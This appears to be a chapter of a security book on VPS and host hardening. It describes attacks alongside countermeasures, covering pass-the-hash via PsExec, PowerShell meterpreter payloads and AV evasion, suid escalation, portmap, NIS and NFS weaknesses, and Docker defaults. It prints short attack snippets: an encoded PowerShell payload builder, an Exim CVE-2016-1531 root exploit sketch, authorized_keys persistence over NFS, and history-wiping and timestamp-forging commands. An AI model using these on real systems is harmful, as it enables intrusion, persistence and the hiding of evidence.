If you have the necessary resources, that is: knowledge, skill, experience, desire, money, and of course the need for high security, which is becoming more and more important all the time, I usually advocate bringing VPS(s) in-house where you have more control. Most of my work around VPSs is with GNU/Linux instances. Most of the testing in this chapter was performed on Debian instances, usually, but not always, web servers. Unless stated otherwise, the following applies to these types of instances.
Take results from higher level Asset Identification found in the 30,000’ View chapter of Fascicle 0. Remove any that are not applicable. Add any newly discovered. Here are some to get you started:
This is probably an incomplete list for your domain. I have given you a start. Put your thinking cap on and populate the rest, or come back to it as additional assets enter your mind.
Go through the same process as we did at the top level in Fascicle 0, but for your VPS(s).
In terms of security, unless your provider is Swiss, you give up so much when you forfeit your system(s) to an external provider. I cover this in my talk “Does Your Cloud Solution Look Like a Mushroom”.
Windows exploitation is prevalent, easy and fun, because there is what seems to be a never ending source of security defects. I am not going to attempt to cover much of it, as I would be here for too long, and this book series is more focused on giving you a broad understanding with examples as we go.
The problem is not so much that there is a never ending source of defects in Windows, but rather, that the platform was not designed with openness as a core attribute. Because of its closed nature, hardening the platform in many cases is very difficult and often comes down to applying band-aids over top of the defects rather than being able to remove them.
If you want a platform that you can have a decent level of control over its security, do not buy into closed offerings.
PsExec was written by Mark Russinovich as part of the Sysinternals tool suite. The PsExec tool allows you to execute programs on remote Windows systems without having to install anything on the server you want to manage or hack; it also serves as a Telnet replacement.
PsExec requires a few things on the target system:
There are several behavioural techniques, or targets as Metasploit calls them, for the psexec module. In this case we use the Native Upload Target, but with a custom compiled payload (set exe::custom), as you can see in The Play below. What happens here is that our payload is embedded into a Windows Service executable within the PsExec executable, which it then deploys to the Admin$ share on the target machine. The DCE/RPC interface is then used over SMB to access the Windows Service Control Manager (SCM) API. PsExec then starts its Windows Service on the target machine. This service then creates a named pipe which can be used to send commands to the system.
The Metasploit psexec module (exploit/windows/smb/psexec) uses basically the same principle. This was the first of the “Pass The Hash” suite of Metasploit modules, first committed on 2007-07-03.
The following attack was the last of five that I demonstrated at WDCNZ in 2015. The previous demo of that series will provide some additional context and it is probably best to look at it first if you have not already.
You can find the video of how it is played out at http://youtu.be/1EvwwYiMrV4.
Just before the Synopsis, I mentioned that there were several behavioural techniques for the psexec module. One of the other techniques, called “MOF Upload Target”, is to use Managed Object Format (MOF) files, which use the C++ syntax. These MOF files must be compiled and are then consumed by Windows Management Instrumentation (WMI). This works quite differently: psexec does not execute anything, all it does is upload your executable to SYSTEM32, and a MOF file to SYSTEM32\wbem\mof\. When Windows receives the event for the new MOF file, it compiles and executes it, which tells Windows to run the payload in SYSTEM32. Metasploit's MOF library only works with Windows XP and Server 2003. There is also the same high chance of getting sprung by AV, although you can carry out similar tricks as we did above to get around the AV signatures.
If you are running a penetration test for a client and your target's AV fires, then it could be game over for you. There are better options that exist now that are less likely to ring alarm bells with your target.
We have just detailed and demonstrated the first of the Metasploit PTH suite above. Kali Linux also has the “Pass the Hash toolkit” (with all tools prefixed with “pth-“). The following are the rest of the Metasploit PTH modules, in order of when they were introduced. All of the PTH suite except psexec_ntdsgrab depend on CVE-1999-0504. They also all make use of the PsExec utility, except the last one, wmi. You will notice that some of these are exploits and some are technically auxiliary modules; as you read their descriptions, you will understand why.
current_user_psexec
exploit/windows/local/current_user_psexec
Uses the psexec module with a UNC path to the file on the victim system; this is essentially a pivot, or lateral movement. You are going to want to find out which system(s), if any, the administrator is connected to, ideally something important like a Domain Controller. From the victim, you can compromise many targets using the same administrator's authentication token.
This is a local exploit: it has to be run against your target from an already compromised administrator account that you have a Meterpreter session on, a reverse shell for example. This is where the pivot occurs.
psexec_command
auxiliary/admin/smb/psexec_command
This module passes the valid administrator credentials, then executes a single arbitrary Windows command on one or more target systems, using a similar technique to the PsExec utility provided by Sysinternals. This will not trigger AV, as no binaries are uploaded; we are simply leveraging cmd.exe. It also does not provide a Meterpreter shell, and concatenating commands with ‘&’ does not work.
psexec_loggedin_users
auxiliary/scanner/smb/psexec_loggedin_users
This module passes the valid administrator credentials, then, using a similar technique to that of the PsExec utility, queries the HKU base registry key on the remote machine with reg.exe to get the list of currently logged in users. Notice this is a scanner module, so it can be run against many target machines concurrently.
psexec_psh
exploit/windows/smb/psexec_psh
This module passes the valid administrator credentials as usual, then attempts to execute a PowerShell payload using a similar technique to the PsExec utility. This method is far less likely to be detected by AV because PowerShell is native to Windows, and each payload is unique, because it is your script and it is just base64 encoded, so it is more likely to escape signature based detection; it also never gets written to disk. It is executed from the command line using the -encodedcommand flag, and provides the familiar Meterpreter shell.
psexec_ntdsgrab
auxiliary/admin/smb/psexec_ntdsgrab
“NTDS.dit and SYSTEM Hive Download Utility”
Similar to SmbExec, which we set up in the Tooling Setup chapter of Fascicle 0, this Metasploit module authenticates to an Active Directory Domain Controller and creates a volume shadow copy of the %SYSTEMDRIVE% using a native Windows tool, vssadmin (visible in the source). It then pulls down copies of the NTDS.dit file as well as the SYSTEM registry hive and stores them. The NTDS.dit and SYSTEM registry hive copies can be used in combination with other tools for offline extraction of AD password hashes. All of this is done without uploading a single binary to the target host.
There are additional details around where NTDS.dit fits into the picture in the Windows section of the Web Applications chapter.
Unlike SmbExec, we have to parse the files that psexec_ntdsgrab downloads for us with a separate tool, also discussed briefly in the Windows section of the Web Applications chapter.
wmi
exploit/windows/local/wmi
Before we cover the Metasploit module, let’s gain a little more understanding around what WMI is, when it was introduced, how wide spread its consumption is, etc.
Windows NT 4.0 (1996-07-29): During this time period, Microsoft released an out-of-band WMI implementation that could be downloaded and installed. Since then Microsoft has consistently added WMI providers.
WMI core components are present by default in all Windows OS versions from Windows 2000 and after. Previous Windows releases can run WMI, but the components have to be installed.
Windows Server 2008 included the minimalistic Server Core, smaller codebase, no GUI (less attack surface).
Windows Server 2012 added the ability to switch between GUI and Server Core.
Windows Server 2016 added Nano Server to the mix of options. Nano Server has what they call a minimal footprint and is headless. It excludes the local GUI, and all management is carried out via WMI, PowerShell, and Remote Server Management Tools (a collection of web-based GUI and command line tools). In Technical Preview 5 (2016-04-17), the ability to manage locally using PowerShell was added. We see a continued commitment to support these tools going forward, so they will continue to be excellent attack vectors and play an important part in the attacker's toolbox, and in the attack surface.
WMI Providers provide interfaces for configuring and monitoring Windows services, along with programming interfaces for consumption via custom built tools.
WMI needs to be accessible for remote access, and there are steps to make sure this is the case. These steps vary according to the specific Windows release and other configuration.
Rather than relying on SMB via the psexec technique and starting a service on the target, the wmi module executes PowerShell on the target using the current user's credentials, or those that you supply, so this is still a PTH technique. We use the WMI Command-line (WMIC) to start a Remote Procedure Call on TCP port 135 and an ephemeral port, then create a ReverseListenerComm to tunnel traffic through that session.
By default, PowerShell is installed on Windows Server 2008 R2 and Windows 7 onwards.
PowerShell “is going to be on all boxes and it is going to provide access to everything on the box”. This is excellent news for penetration testers and other attackers!
On Windows Server from PowerShell 4.0 onwards (Windows 8.1, Server 2012 R2), the default execution policy is RemoteSigned, but that is easily overridden in a script as you will see soon. We:
Then you just need to get some code run on your target's machine. There are many ways to achieve this. Off the top of my head:
Office files or PDFs generated by Metasploit or setoolkit usually trigger AV, but this is much easier to get around with PowerShell.
Traditionally the payload would have to be saved to the target's file system, but with PowerShell and other scripting languages, the payload can remain in memory, which defeats many AV products along with HIDS/HIPS. AV vendors continue to get better at detecting malware that is compiled to native assembly, but they struggle to interpret the intent of scripts, as it is so easy to make changes to a script while keeping its intent the same. To make matters worse, PowerShell is now tightly integrated with the Windows operating system.
So what we are doing is making our viruses and payloads look like chameleons or business as usual (BAU), to detection mechanisms.
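As a rough illustration of how such a payload ends up on the command line (the shape of it, rather than any particular tool's output): the script text is UTF-16LE encoded, base64 encoded, then handed to PowerShell's -EncodedCommand switch.

```bash
# payload.ps1 is a placeholder for whatever script you have generated
b64=$(iconv -f UTF-8 -t UTF-16LE payload.ps1 | base64 -w 0)
echo "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand $b64"
```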
Meterpreter is an excellent platform for attacking with. It provides us with many useful tools which make tasks like privilege escalation, establishing persistence, lateral movement, pivoting, and others, much easier.
The shellcodes available in psmsf are the following msfvenom payloads, of which we use the second one in this play:
windows/shell/reverse_tcp
windows/meterpreter/reverse_tcp
windows/meterpreter/reverse_http
You can find the video of how this attack is played out at https://youtu.be/a01IJzqYD8I.
If you do not already have psmsf on your attack machine, go ahead and clone it as discussed in the Tooling Setup chapter of Fascicle 0.
When psmsf is run as per above, the Metasploit windows/meterpreter/reverse_tcp shellcode is generated by running msfvenom programmatically as the following:
psmsf then takes the generated output and, in a function called extract_msf_shellcode, strips out the characters that do not actually form part of the raw shellcode, such as the assignment to a char array, double quotes, new lines, semicolons, white space, etc, and just leaves the raw shellcode.
psmsf then replaces any instances of \x with 0x.
psmsf then passes the cleaned up reverse_tcp shellcode to a function called generate_powershell_script, which embeds it into a PowerShell script that is going to become the main part of our payload.
That code looks like the following; I have added the annotations to help you understand how it works:
psmsf is licensed under the BSD License.
The powershell_hacking.bat file that we copy to our web hosting directory as payload.txt is the result of the content referenced by the returned shellcode variable above, after it has been utf_16_le encoded and then base64 encoded. This occurs in generate_powershell_command as follows:
After working with PowerShell exploitation for a few weeks, what quickly becomes apparent is how powerful, easy and effective exploitation and post-exploitation are with PowerShell as the medium. There are many tools and modules available to use; often some will not quite work, then you will find a similar variant that someone has taken and improved that does the job adequately. For example, the attack I just demonstrated was based on the TrustedSec unicorn.py, which did not quite work for me. Upstream of unicorn is Invoke-Shellcode.ps1 from the PowerShellMafia PowerSploit project, which looks to be in good shape. Matt Graeber's technique of injecting a given shellcode into the running instance of PowerShell is the common theme running through the PowerShell shellcode injection exploits used in a number of projects. Matt blogged about this technique in 2011, and it is very similar to what we just used above with psmsf. The landscape is very fluid, but there are always options, usually without requiring any code modifications.
The Veil-Framework's Veil-Evasion has a similar set of payloads that @harmj0y has blogged about. Kevin Dick also wrote a decent blog post on these.
Problems with the other payloads
When I tested the payload generated by version 7.4.3 of setoolkit, via the menu path 1) Social Engineering Attacks -> 9) Powershell Attack Vectors -> 1) Powershell Alphanumeric Shellcode Injector, it did not work; this may have been fixed in a later version.
Running an executable or convincing your target to run it works in many cases, but other options like office documents can work well also. Nishang is a framework and collection of scripts and payloads that empower us to use PowerShell for all phases of penetration testing. Amongst the many goodies in Nishang is a collection of scripts which can create office documents such as Word, Excel, CHM and a handful of others.
I have not provided a video with this play as it is very similar to the previous one.
If you do not already have nishang on your Windows attack machine, go ahead and clone it as discussed in the Tooling Setup chapter of Fascicle 0.
Metasploit had a Meterpreter script called persistence.rb that could create a persistent (surviving reboots and most other actions a user will take) reverse shell, but these scripts are no longer supported. If you try to use it, you will probably get an error like: “windows version of Meterpreter is not supported with this Script”.
Now the exploit/windows/local/persistence module is recommended for persistence. AV picks this up on reboot though, so you probably will not get far with this.
We can do better than meterpreter. PowerSploit has a module called Persistence, and that is what we use in this play. This adds persistence to the PowerShell one liner that was embedded in the psmsf virus we created above, namely download-payload-execute, and also used in the office document attack with nishang. The one liner was:
I had a play with the nishang Add-Persistence.ps1 script, which may be useful for creating post-exploitation persistence, but I was looking for a solution to create an atomic persistent exploit, which is what PowerSploit provides.
You can find the video of how this attack is played out at https://youtu.be/al9RX40QuXU.
If you do not already have PowerSploit on your Windows attack machine, go ahead and clone it as discussed in the Tooling Setup chapter of Fascicle 0.
The PowerSploit Persistence module offers the following persistence techniques:
At the following stages:

* AtLogon
* AtStartup
* OnIdle
* Daily
* Hourly (as we have just seen)
* At (specify specific times)

There are many ways to achieve persistence. I have not included any lateral movement or privilege escalation amongst these PowerShell plays, but feel free to take your post exploitation further. Even the tools we have used in these plays have a good variety of both.
Failing to segment a file system according to the least amount of privilege that authorised parties require is often the precursor to privilege escalation.
Privileged services that are started on system boot by your init system (as discussed under the Proactive Monitoring section) often run other executable files whether they be binaries or scripts.
When an executable (usually run as a daemon) is called by one of these privileged services and is itself writeable by a low privileged user, then a malicious actor can swap the legitimate executable for a trojanised replica, or even just a malicious executable if they think it will go unnoticed.
If we take the path of least resistance when setting up our partitions at installation time, by combining file system resources that have lesser requirements for higher privileges with those that have greater requirements, then we are not applying the principle of least privilege. What this means is that some resources that do not need the extra privileges in order to do their job get given them anyway. Attackers can take advantage of this by swapping in (writing) and executing malicious files, directly or indirectly.
If the target file that an attacker wants to swap for a trojanised version is world writeable, user writeable, or even group writeable, and they are that user or in the specified group, then they will be able to swap the file… unless the mounted file system is restrictive enough to mitigate the action.
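A quick, hedged way to hunt for such files is to search the locations your privileged services execute from for group or world writeable files; the paths below are only examples, adjust them to your init system and install locations.

```bash
# Regular files under typical service/executable paths that others, or their group, can write to
find /etc/init.d /usr/sbin /usr/local/sbin /usr/local/bin /opt -xdev -type f \
  \( -perm -o+w -o -perm -g+w \) -ls 2>/dev/null
```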
unix-privesc-check has an older version on the 1_x branch (a single unix-privesc-check file), which is fine, but the later version which sits on the master branch (an upc.sh main file plus many sub files) does a lot more, so it can be good to use both. You just need to get the shell file(s) from either the 1_x or master branch onto your target machine and run them. Running as root allows the testing to be a lot more thorough, for obvious reasons. If I am testing my own host, I will start with upc.sh; I like to test as a non root user first, as that is the most realistic in terms of how an attacker would use it. Simply looking at the main file will give you a good idea of the options, or you can just run: ./upc.sh -h
To run:
# Produces a reasonably nice output
./upc.sh > upc.output
You can check which options your file systems are currently mounted with by running mount. Then:

* Copy an executable file to a partition mounted with noexec, as specified in /etc/fstab, and attempt to run it; it should fail.
* Writing a file to a partition that has the ro (read-only) option specified against it in /etc/fstab should also fail.
* Adding the nosuid option to your mounts prevents the suid (Set owner User ID) bit on executables from being respected. If, for example, we have an executable that has its suid bit set, any other logged in user temporarily inherits the file owner's permissions, as well as the UID and GID, to run that file, rather than their own permissions.

Running a directory listing of a directory containing a file with its suid bit set will produce a permission string similar to -rwsr--r--. The s is in the place of the owner's executable bit. If instead a capital S is used, it means that the file is not executable.
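As a sketch of what the above looks like in practice (the device name and mount points are illustrative only), an /etc/fstab entry and a quick noexec test might be:

```bash
# Example /etc/fstab entry applying the restrictive options discussed above:
# /dev/sdb1  /tmp  ext4  defaults,nodev,nosuid,noexec  0  2

# Quick way to see noexec in action without repartitioning, using a temporary tmpfs mount
sudo mount -t tmpfs -o noexec,nosuid,nodev tmpfs /mnt
cp /bin/ls /mnt/
/mnt/ls    # should fail with "Permission denied" because of noexec
```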
All suid files can be found with the following command:
find / -perm -4000 -type f 2>/dev/null
All suid files owned by root can be found with the following command:
find / -uid 0 -perm -4000 -type f 2>/dev/null
To add the suid bit, you can do so the symbolic way or the numeric way.
symbolic:
chmod u+s <yourfile>
numeric:
chmod 4750 <yourfile>
This adds the suid bit, along with read, write and execute for owner, read and execute for group, and no permissions for other. This is just to give you an idea of the relevance of the 4 in the above -4000. Do not go setting the suid bit on files unless you fully understand what you are doing and have good reason to. This could introduce a security flaw, and if the file is owned by root, you may have just added a perfect vulnerability for an attacker to elevate their privileges to root, due to a defect in your executable or the fact that the file can be modified or replaced.
So, for example, if root owns a file and the file has its suid bit set, anyone can run that file as root.
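A familiar example you can check on most GNU/Linux installs is passwd, a root owned suid executable (the exact size and date will of course differ):

```bash
ls -l /usr/bin/passwd
# -rwsr-xr-x 1 root root 54256 Mar 29  2016 /usr/bin/passwd
```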
We will now walk through the steps of how an attacker may carry out a privilege escalation.
You can find the video of how it is played out at https://youtu.be/ORey5Zmnmxo.
The Countermeasures sections that address this are:
This same concept was covered in the People chapter of Fascicle 0, and it also applies to VPSs. In addition to that, the risks are addressed within the Countermeasures section.
Allowing root logins is a lost opportunity for another layer of defence in depth, where the user must elevate privileges before performing any task that could possibly negatively impact the system. Once an attacker is root on a system, the system is owned by them. Root is a user, and no guess work is required for that username. Other low privileged users require some guess work on the part of the username as well as the password, and even once both parts of a low privileged credential have been acquired, there is another step to total system ownership.
You may remember we did some fingerprinting of the SSH daemon in the Reconnaissance section of the Processes and Practises chapter in Fascicle 0. SSH in itself has been proven to be solid. In saying that, SSH is only as strong as the weakest link involved. For example, if you are using the default of password authentication, have not configured which remote hosts can or can not access the server, and choose to use a weak password, then your SSH security is only as strong as the password. There are many configurations that a default install of SSH uses in order to get up and running quickly that need to be modified in order to harden SSH. Using SSH in this manner can be convenient initially, but it is always recommended to move from the defaults to a more secure model of usage. I cover many techniques for configuring and hardening SSH in the SSH Countermeasures section.
Being able to boot from media other than that of your standard OS, whether virtual or real, provides additional opportunity for an attacker to install a root-kit on your machine.
An attacker can probe the Open Network Computing Remote Procedure Call (ONC RPC) port mapper service on the target host, where the target host is an IP address or a host name.
If installed, the rpcinfo command with -p will list all RPC programs (such as quotad, nfs, nlockmgr, mountd, status, etc) registered with the port mapper (whether the deprecated portmap or the newer rpcbind). Many RPC programs are vulnerable to a collection of attacks.
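A minimal probe looks something like the following; the target host name is a placeholder, and the Nmap rpcinfo script gives you much the same listing if rpcinfo is not installed locally.

```bash
# List RPC programs registered with the target's port mapper (TCP/UDP 111)
rpcinfo -p target.example.com

# The same enumeration via Nmap's rpcinfo NSE script
nmap -sSU -p 111 --script=rpcinfo target.example.com
```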
This provides a list of RPC services running that have registered with the port mapper, thus providing an attacker with a lot of useful information to take into the Vulnerability Searching stage discussed in the Process and Practises chapter of Fascicle 0.
The deprecated portmap service, as well as the newer rpcbind, listen on port 111 for requesting clients; some Unix and Solaris versions will also listen on ports above 32770.
Besides providing the details of RPC services, portmap and rpcbind are inherently vulnerable to DoS attacks, specifically reflection and amplification attacks; in fact, the way they work invites this. Clients make a request and the port mapper responds with all the RPC servers that have registered with it, thus the response is many times larger than the request. This serves as an excellent vector for DoS, saturating the network with amplified responses.
These types of attacks have become very popular amongst distributed attackers due to their significant impact, lack of sophistication and ease of execution. Level 3 Threat Research Labs published a blog post on this port mapper DoS attack and how it has become very popular since the beginning of August 2015.
US-CERT also published an alert on UDP-Based Amplification Attacks outlining the Protocols, Bandwidth Amplification Factor, etc.
You will notice in the response as recorded by Wireshark, that the length is many times larger than the request, 726 bytes in this case, hence the reflected amplification:
The packet capture in Wireshark, which is not shown here, also confirms that it is UDP.
Exim, along with offerings such as Postfix, Sendmail, Qmail, etc, is a Mail Transfer Agent (MTA); on a web server, an MTA is probably not required.
There have been plenty of exploits created for Exim security defects. Most of the defects I have seen have patches available, so if Exim is a necessity, stay up to date with your patching. If you are still on stable (jessie at the time of writing) and can not update to a testing release, make sure to use backports.
At the time of writing this, the very front page of the Exim website states “All versions of Exim previous to version 4.87 are now obsolete and everyone is very strongly recommended to upgrade to a current release.”.
Jessie (stable) uses Exim 4.84.2, whereas jessie-backports uses Exim 4.87; 4.86.2 was patched for the likes of CVE-2016-1531. Now if we have a look at the first exploit for this vulnerability (https://www.exploit-db.com/exploits/39535/) and dissect it a little:
The Perl shell environment variable $PERL5OPT can be assigned options; these options will be interpreted as if they were on the #! line at the beginning of the script. These options will be treated as part of the command run, after any optional switches included on the command line are accepted.
-M, which is one of the allowed switches (-[DIMUdmw]) to be used with $PERL5OPT, allows us to attempt to use a module from the command line. So with -Mroot we are trying to use the root module; PERL5OPT=-Mroot effectively puts -Mroot on the first line like the following, which runs the script as root:
#!perl -Mroot
The Perl shell environment variable $PERL5LIB is used to specify a colon (or semicolon on Windows) separated list of directories in which to look for Perl library files, before looking in the standard library and the current directory. Assigning /tmp to $PERL5LIB immediately before the exploit is run means the first place execution will look for the root module is the /tmp directory.
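Putting those two environment variables together, the shape of the public exploit is roughly the following sketch; the path to the Exim binary varies by install, and the root.pm contents here are illustrative rather than a copy of the exploit.

```bash
# Drop a malicious Perl module where PERL5LIB will find it first
cat > /tmp/root.pm << 'EOF'
package root;
# Runs inside the setuid root Exim process once -Mroot is injected via PERL5OPT
system("/bin/sh");
EOF

# Ask the setuid root Exim to start its embedded Perl with our module preloaded
PERL5LIB=/tmp PERL5OPT=-Mroot exim -ps
```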
Some History:
NIS+ was introduced as part of Solaris 2 in 1992 with the intention that it would eventually replace Network Information Service (NIS), originally known as Yellow Pages (YP). NIS+ featured stronger security, authentication, greater scalability and flexibility, but it was more difficult to set up, administer and migrate to, so many users stuck with NIS. NIS+ was removed from Solaris 11 at the end of 2012. Other more secure distributed directory systems such as Lightweight Directory Access Protocol (LDAP) have come to replace NIS(+).
What NIS is:
NIS is a Remote Procedure Call (RPC) client/server system and protocol providing a directory service, letting many machines in a network share a common set of configuration files with the same account information, such as the commonly locally stored UNIX /etc/passwd and the referenced /etc/shadow, which contains the hashed passwords, discussed in detail under the Review Password Strategies section.

The NIS master server maintains canonical database files called maps. We also have slave servers, which have copies of these maps. Slave servers are notified by the master via the yppush program when any changes to the maps occur. The slaves then retrieve the changes from the master in order to synchronise their own maps. The NIS clients always communicate directly with the master, or a slave if the master is down or slow. Both master and slave(s) service all client requests through ypserv.
Vulnerabilities and exploits:
NIS has had its day. It is vulnerable to many exploits, such as DoS attacks using the finger service against multiple clients, buffer overflows in libnasl, “lax authentication while querying of NIS maps (easy for a compromised client to take advantage of), as well as the various daemons each having their own individual issues. Not to mention that misconfiguration of NIS or netgroups can also provide easy holes that can be exploited. NIS databases can also be easily accessed by someone who doesn’t belong on your network. How? They simply can guess the name of your NIS domain, bind their client to that domain, and run a ypcat command to get the information they are after.”
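In practice that last step is only a few commands; everything below is a placeholder (domain, server and map names), but it shows how little is needed once the domain name has been guessed.

```bash
# Bind this client to the guessed NIS domain, then dump the password map
domainname target-nis-domain
ypcat -d target-nis-domain -h nis-server.target.tld passwd.byname
```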
NIS can run on unprivileged ports, which means that any user on the system(s) can run the daemons. If a replacement version of these daemons was put in place of the original, then the attacker would have access to the resources that the daemons control.
rpcbind listens on the same port(s) as the deprecated portmap and suffers the same types of DoS attacks.
Telnet provides a command line interface on a remote server via its application layer client-server protocol, traditionally on port 23. Telnet was created and launched in 1969; it provides no encryption, so credentials are sent in plain text. There have been extensions to the Telnet protocol which provide Transport Layer Security (TLS) and Simple Authentication and Security Layer (SASL), but many Telnet implementations do not support these.
Telnet still ships turned on in many cheap hardware appliances, which continue to provide an excellent source of ownable resources for those looking to acquire computing devices illegally to launch attacks from. Many of these devices also never have their default credentials changed.
The FTP protocol was not designed with security in mind; it does not use any form of encryption. The credentials you use to authenticate, and all of your traffic, including any sensitive information in the files that you send to or receive from the FTP server, will be on the wire in plain text. Even if you think your files do not contain any sensitive information, often there will be details hiding; for example, if you are [m]putting / [m]getting source files, there could be database credentials or other useful bits of information in config files.
Many people have been using FTP for years, in many cases never even considering the fact that FTP adds no privacy to anything it touches.
Most FTP clients also store the user's credentials in plain text, completely neglecting defence in depth. You should consider that your client machine is already compromised. If credentials are stored encrypted, then that is one more challenge an attacker must conquer. Software created with security in mind recognises this, and if it must store credentials, they will be hashed via a best of breed KDF (as discussed in the Data-store Compromise section of the Web Applications chapter) with the recommended number of iterations (as discussed in the Review Password Strategies section a little later in this chapter). In regards to FTP though, the clients are designed to store multiple credentials, one set for each site, the idea being that you do not have to remember them, so they need to be encrypted, rather than hashed (one way, not reversible), so they can be decrypted.
A couple of the most popular clients are:
FileZilla (cross platform) FTP client stores your credentials in plain text. Yes, the UI conceals your password from shoulder surfers, but that is the extent of its security, basically none.
WinSCP (Windows) is an FTP, SFTP and SCP client for Windows. WinSCP has a number of ways in which you can have it deal with passwords. By default, when a user enters their password on the authentication window, it is stored in memory and reused for all subsequent authentications during the same session. This is of course open to exploitation as is; in-memory data can also be swapped to disk, written to crash dump files and accessed by malware.
Another option is to store passwords, along with other site specific configuration, in the registry for the installed WinSCP, or in an INI file (overridable) for the portable version. These passwords are stored obfuscated; as the documentation puts it, they are “stored in a manner that they can easily be recovered”. If you are interested, you can check the EncryptPassword function on the WinSCP GitHub mirror, in which a short and simple set of bitwise operations are performed on each character of the password, and the user and host are concatenated as what looks to be some sort of pseudo-salt. Although this option exists, it is recommended against.
And here is why: the decrypt_password exploit is consumed by the winscp Metasploit module. Additional details can be found on the cosine-security blog.
The recommended way to store the site specific passwords is to use a Master Password. This appears to use a custom implementation of the AES256 block cipher, with a hard-coded 1000 rounds of SHA1.
WinSCP provides a lot of options, which may or may not be a good thing.
mountd, or rpc.mountd, is the NFS mount daemon that listens for and services NFS client requests to mount a file system. If mounts are listed in /etc/fstab, attempts will be made to mount them on system boot. If the mountd daemon is listed in the output of the above rpcinfo command, the showmount -e command will be useful for listing the NFS server's list of exports, defined in the server's /etc/exports file.
NFS is one of those protocols that you need to have some understanding of in order to achieve a level of security sufficient for your target environment. NFS provides no user authentication, only host based authentication. NFS relies on the AUTH_UNIX method of authentication: the user ID (UID) and group IDs (GIDs) that the NFS client passes to the server are implicitly trusted.
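With nothing more than host based trust in play, the attacker's side of this is short; the target address below is a placeholder, and it assumes / has been exported without restrictions.

```bash
# Enumerate the target's NFS exports
showmount -e target.example.com

# Mount the exported root filesystem locally
sudo mount -t nfs target.example.com:/ /mnt
```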
All going well for the attacker, they will now have your VPS's / directory mounted to their /mnt directory. If you have not set up NFS properly, they will have full access to your entire file system.
To establish some persistence, an attacker may be able to add their SSH public key:
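A sketch only, assuming the target's root filesystem is mounted read-write at /mnt as above and that root SSH logins are permitted:

```bash
# Append the attacker's public key to root's authorized_keys on the mounted filesystem
mkdir -p /mnt/root/.ssh
cat ~/.ssh/id_rsa.pub >> /mnt/root/.ssh/authorized_keys
```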
The NFS daemon always listens on the unprivileged port 2049. An attacker without root privileges on a system can start a trojanised nfsd which will be bound to port 2049. If they can stop the legitimate nfsd and run their own, clients may communicate with the trojanised nfsd and possibly consume similar exports. By replacing an NFS daemon with a trojanised replica, the attacker would also have access to the resources that the legitimate daemon controls. The ports that a Linux server will bind its daemons to are listed in /etc/services.
As well as various privilege escalation vulnerabilities, NFS has also suffered from various buffer overflow vulnerabilities.
As I was writing this section, I realised that visibility is actually an asset, so I went back and added it… to several chapters, in fact. Without visibility, an attacker can do a lot more damage than they could if you were watching them and able to react, or even if you just had good auditing capabilities. It is in fact an asset that attackers often try to remove for this very reason.
Any attacker worth their weight will try to cover their tracks as they progress. Once an attacker has shell access to a system, they may:
* Run ln -sf /dev/null ~/.bash_history so that all following history vanishes.
* Run touch -r <referenceFile> <fileThatGetsReferenceFileTimeStampsApplied> to apply the timestamps of a reference file to any files they have modified.
* Modify md5sum so that it contains sums for the files that were replaced, including itself. Although if an administrator ran rpm -V or debsums -c (Debian, Ubuntu), it would not be affected by a modified md5sum.
If an attacker wants their actions to be invisible, they may try replacing the likes of ps, pstree, top, ls, and possibly netstat or ss and/or many other tools that reveal information about the system, if they are trying to hide network activity from the host.
Taking things further, an attacker may load a kernel module that modifies the readdir() call and the proc filesystem so that any changes on the file system are untrustworthy; if they are going to the length of loading custom modules, everything can be done from kernel space, which is invisible until reboot.
Without visibility, an attacker can access your system(s) and alter, copy, or modify information without you knowing they did it, or even launch DoS attacks without you noticing anything before it is too late.
With the continual push for shorter development cycles, combined with continuous delivery, cloud and virtual based infrastructure, containers have become an important part of the continuous delivery pipeline. Docker has established itself as a top contender in this space.
Many of Docker's defaults favour ease of use over security; in saying that, Docker's security considerations follow closely behind. After working with Docker, performing the research for these sections on Docker security, and having had the chance to discuss many of my concerns and preconceived ideas with Docker Security Team lead Diogo Mónica over this period, it is my belief that by default Docker containers, infrastructure and orchestration provide better security than running your applications in Virtual Machines (VMs). Just be careful when comparing containers with VMs, as this is analogous to comparing apples with oranges.
The beauty, in terms of security, of Docker is the immense configurability it provides to improve security many times over the defaults. In order to do this, you will have to invest some time and effort into learning about the possible issues, the features, and how to configure them. It is this visibility that I have attempted to create in these sections on Docker security.
Docker security is similar to VPS security, except there is a much larger attack surface, due to running many containers with many different packages, many of which do not receive timely security updates, as noted by banyan and the morning paper.
A monolithic kernel such as the Linux kernel, containing tens of millions of lines of code which are reachable from untrusted applications via all sorts of networking, USB and driver APIs, has a huge attack surface. Adding Docker into the mix has the potential to expose all these vulnerabilities to each and every running container and the applications within, thus making the attack surface of the kernel grow exponentially.
Docker leverages many features that have been in the Linux kernel for years, which provide a lot of security enhancements out of the box. The Docker Security Team is working hard to add additional tooling and techniques to further harden their components; this has become obvious as I have investigated many of them. You still need to know what all the features, tooling and techniques are, and how to use them, in order to determine whether your container security is adequate for your needs.
The Docker overview says: “Docker provides the ability to package and run an application in a loosely isolated environment”. Later in the same document it says: “Each container is an isolated and secure application platform, but can be given access to resources running in a different host or container”, leaving the “loosely” out. Then it goes on to say: “Encapsulate your applications (and supporting components) into Docker containers”. The meaning of encapsulate is to enclose, but if we are only loosely isolating, then we are not really enclosing, are we? I will address this concern in the following Docker sections and subsections.
To start with, I am going to discuss many areas where we can improve container security, then at the end of this Docker section I will discuss why application security is far more of a concern than container security.
Similar to Consuming Free and Open Source from the Web Applications chapter, many of us trust the images on docker hub without much consideration to the possible defective packages within. There have been quite a few reports with varying numbers of vulnerable images as noted by Banyan and “the morning paper” mentioned above.
The Docker Registry project is an open-source server side application that lets you store and distribute Docker images. You could run your own registry as part of your organisation's Continuous Integration (CI) / Continuous Delivery (CD) pipeline. Some of the publicly known instances of the registry are:
Beware of doppelganger images that will be available for all to consume, similar to doppelganger packages that we discuss in the Web Applications chapter. These can contain a huge number of packages and code to hide malware in a Docker image.
What is worse, Docker's default is to run containers, and all commands / processes within a container, as root. This can be seen by running the following command from the CIS_Docker_1.13.0_Benchmark:
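The benchmark's audit command is along these lines (verify against your copy of the benchmark); an empty User= value at the end of a line means that container is running as root.

```bash
docker ps --quiet | xargs docker inspect --format '{{ .Id }}: User={{ .Config.User }}'
```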
If you have two containers running and the user has not been specified you will see something like the below, which means your two containers are running as root.
Images derived from other images inherit the same user defined in the parent image explicitly or implicitly, so unless the image creator has specifically defined a non root user, the user will default to root. That means, all processes within the container will run as root.
Considering these processes run as root, and have indirect access to most of the Linux Kernel (20+ million lines of code written by humans) APIs such as networking, USB, storage stacks, and others via System calls, the situation may look bleak.
